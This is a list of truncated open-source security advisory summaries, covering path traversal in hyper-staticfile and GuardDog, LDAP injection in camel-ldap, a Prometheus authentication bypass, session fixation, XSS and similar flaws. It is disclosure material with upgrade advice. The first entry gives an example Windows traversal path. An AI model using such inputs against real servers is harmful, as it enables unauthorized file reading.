Path resolution in hyper-staticfile didn’t correctly validate Windows paths, meaning paths like /foo/bar/c:/windows/web/screen/img101.png would be allowed and respond with the contents of c:/windows/web/screen/img101.png. Thus users could potentially r…
[capnp] Cap’n Proto and its Rust implementation vulnerable to out-of-bounds read due to logic error handling list-of-list
The Cap’n Proto library and capnp Rust package are vulnerable to out-of-bounds read due to logic error handling list-of-list. If a message consumer expects data of type “list of pointers”, and if the consumer performs certain specific actions on such d…
[org.apache.camel:camel-ldap] camel-ldap component allows LDAP Injection when using the filter option
The camel-ldap component allows LDAP Injection when using the filter option. Users are recommended to either move to the Camel-Spring-Ldap component (which is not affected) or upgrade to 3.14.6 or 3.18.4.
References
https://nvd.nist.gov/vuln/detail/CV…
[nadesiko3] nadesiko3 allows remote attacker to inject invalid value to decodeURIComponent of nako3edit
Nako3edit is the editor component of Nadeshiko 3, a programming language developed based on Japanese. Improper check or handling of exceptional conditions in Nako3edit v3.3.74 and earlier allows a remote attacker to inject an invalid value to decodeURI…
[phpxmlrpc/phpxmlrpc] phpxmlrpc vulnerable to argument injection
phpxmlrpc vulnerable to argument injection via local file access in Client:send via manipulation of $protocol argument.
References
https://github.com/gggeek/phpxmlrpc/issues/81
https://github.com/FriendsOfPHP/security-advisories/blob/master/phpxmlrpc…
[github.com/prometheus/exporter-toolkit] Prometheus Exporter-Toolkit is vulnerable to authentication bypass
Impact
Prometheus and its exporters can be secured by a web.yml file that specifies usernames and hashed passwords for basic authentication.
Passwords are hashed with bcrypt, which means that even if you have access to the hash, it is very hard to find…
[guarddog] GuardDog vulnerable to arbitrary file write when scanning a specially-crafted PyPI package
Impact
Running GuardDog against a specially-crafted package can allow an attacker to write an arbitrary file on the machine where GuardDog is executed.
This is due to a path traversal vulnerability when extracting the .tar.gz file of the package being …
[github.com/mittwald/kube-httpcache] kube-httpcache is vulnerable to Cross-Site Request Forgery (CSRF)
Impact
A request forgery attack can be performed on Varnish Cache servers that have the HTTP/2 protocol turned on. An attacker may introduce characters through the HTTP/2 pseudo-headers that are invalid in the context of an HTTP/1 request line, causin…
[tribalsystems/zenario] Tribal Systems Zenario CMS vulnerable to Session Fixation
Tribal Systems Zenario CMS 9.3.57595 is vulnerable to session fixation. In Zenario CMS, the user session identifier (authentication token) is issued to the browser prior to authentication but is not changed after user logout and login again into the ap…
[baserproject/basercms] baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability
There is a cross-site scripting vulnerability on the management system of baserCMS.
This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new v…